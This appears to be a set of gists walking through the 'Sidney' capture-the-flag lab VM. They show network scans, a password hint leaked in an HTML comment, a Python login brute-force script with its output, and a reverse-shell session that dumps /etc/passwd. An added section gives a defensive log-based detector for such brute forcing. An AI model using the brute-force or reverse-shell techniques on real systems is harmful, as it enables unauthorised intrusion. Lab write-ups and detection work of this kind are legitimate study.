@ByteReaper
ByteReaper / HelloWorld.sh
Created June 6, 2016 17:16
ByteReaper - Hello World
echo "SGVsbG8gV29ybGQuLi4gTGV0IHRoZSBSZWFwaW5nIEJlZ2lu" | base64 -d
#Hello World... Let the Reaping Begin
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.234.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.234.167 00:0c:29:5d:88:b2 1 60 VMware, Inc.
192.168.234.254 00:50:56:e1:ab:9c 1 60 VMware, Inc.
root@kali:~# nmap -sS -Pn -p1-65535 192.168.234.167
Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-06 14:14 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.234.167
Host is up (0.000068s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:5D:88:B2 (VMware)
root@kali:~# nikto -host 192.168.234.167
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.234.167
+ Target Hostname: 192.168.234.167
+ Target Port: 80
+ Start Time: 2016-06-06 14:22:04 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x116 0x5339ba83ee199
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 6 14:27:52 2016
URL_BASE: http://192.168.234.167/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
---- Scanning URL: http://192.168.234.167/ ----
@ByteReaper
ByteReaper / gist:4689ddc35010aa3767dcf4b0ac93134e
Created June 6, 2016 18:41
Sidney_HomeScreen_ViewSource
<TITLE>38911 Bytes Free</TITLE>
<BODY>
So.... Back for more are you....? Give Ben Daglish a call. I'm sure
he's know the login B-)
<br></br>
<B>Commodore 64 Still ready</B>
<br></br>
<img src="commodore64/c64_1280x1024.jpg" alt="commodore64" height="1024" width="1280">
</BODY>
<title>Shoo!</title>
<!-- added by robhubbard password is the C=64 sound chip lowercase -->
<!-- 3letters4digits no space... Instead, show user a proper micro -->
<BODY>
Will you go away, I'm trying to press play on tape and you bother me kid!
<br></br>
<img src="200.gif" alt="commodore64" height="408" width="544">
</BODY>
import requests

url = 'http://192.168.234.167/commodore64/index.php'
user = 'robhubbard'
lastLen = 0  # length of the previous response; a change in size marks a different page

for i in range(0, 9999):
    passwd = 'mos{}'.format(i)
    resp = requests.post(url, files={'input_username': (None, user),
                                     'input_password': (None, passwd),
                                     'path': (None, '')})
    if lastLen != len(resp.text):
        print(len(resp.text))
        print('Using {} resulted in a different page size'.format(passwd))
        lastLen = len(resp.text)
1841
Using mos3935 resulted in a different page size
18438
Using mos6518 resulted in a different page size
1841
Using mos6519 resulted in a different page size
1840
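The script above leaves a very recognisable trace on the web server: thousands of POSTs to one login path from one client in a short span, with near-identical response sizes and a single outlier. The following is an added example (not part of ByteReaper's gists) showing how a defender would spot that in an Apache combined-format access log. It assumes the login path /commodore64/index.php from the page, a threshold of 20 POSTs per 60-second window chosen for illustration, and constructed log lines using documentation-range IPs (192.0.2.0/24); none of the log data comes from the original page.

```python
"""Detect a response-length-oracle password brute force in Apache access logs.

Added example, not the gist author's code. Parses Apache "combined" log lines,
buckets POST requests to a watched path by client IP, flags any IP that sends
more than `threshold` POSTs inside a `window`-second span, and tallies the
distinct response sizes for that IP: one outlier size among many identical
ones is exactly the signal the brute-force script on the page waits for.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def detect_bruteforce(lines, path, threshold=20, window=60):
    """Return {ip: {"count": total_posts, "sizes": {size: n}}} for every IP that
    sent more than `threshold` POSTs to `path` within any `window` seconds."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            per_ip[rec["ip"]].append(rec)

    hits = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        # Sliding window over the sorted timestamps of this client's POSTs.
        for end in range(len(recs)):
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window:
                start += 1
            if end - start + 1 > threshold:
                sizes = defaultdict(int)
                for r in recs:
                    sizes[r["size"]] += 1
                hits[ip] = {"count": len(recs), "sizes": dict(sizes)}
                break
    return hits


def build_sample_log():
    """Constructed sample data: one client hammers the login form while two
    others behave normally. IPs are from the 192.0.2.0/24 documentation range."""
    base = datetime(2016, 6, 6, 14, 30, 0, tzinfo=timezone(timedelta(hours=-4)))
    lines = []
    for i in range(30):
        size = 18438 if i == 17 else 1841  # one success-sized reply among failures
        ts = (base + timedelta(seconds=i)).strftime(TS_FMT)
        lines.append(f'192.0.2.10 - - [{ts}] "POST /commodore64/index.php HTTP/1.1" 200 {size}')
    for i in range(3):
        ts = (base + timedelta(seconds=i * 10)).strftime(TS_FMT)
        lines.append(f'192.0.2.20 - - [{ts}] "GET /commodore64/index.php HTTP/1.1" 200 1841')
    for i in range(2):
        ts = (base + timedelta(seconds=i * 30)).strftime(TS_FMT)
        lines.append(f'192.0.2.30 - - [{ts}] "POST /commodore64/index.php HTTP/1.1" 200 1841')
    return lines


if __name__ == "__main__":
    for ip, info in detect_bruteforce(build_sample_log(), "/commodore64/index.php").items():
        print(f"{ip}: {info['count']} POSTs, response sizes seen: {info['sizes']}")
```

On the constructed sample only 192.0.2.10 is flagged, with 29 responses of 1841 bytes and one of 18438, which is the same size jump the gist's output shows for mos6518. The 1841-byte replies are all failed logins, so a single outlier in the size histogram is worth checking against the session log for that client.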
@ByteReaper
ByteReaper / gist:e6d5aa4cf300ebd31981f457913b95c1
Created June 6, 2016 19:47
Sidney_ReverseShell_ConnectBack
connect to [192.168.234.2] from (UNKNOWN) [192.168.234.167] 43464
Linux sidney 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin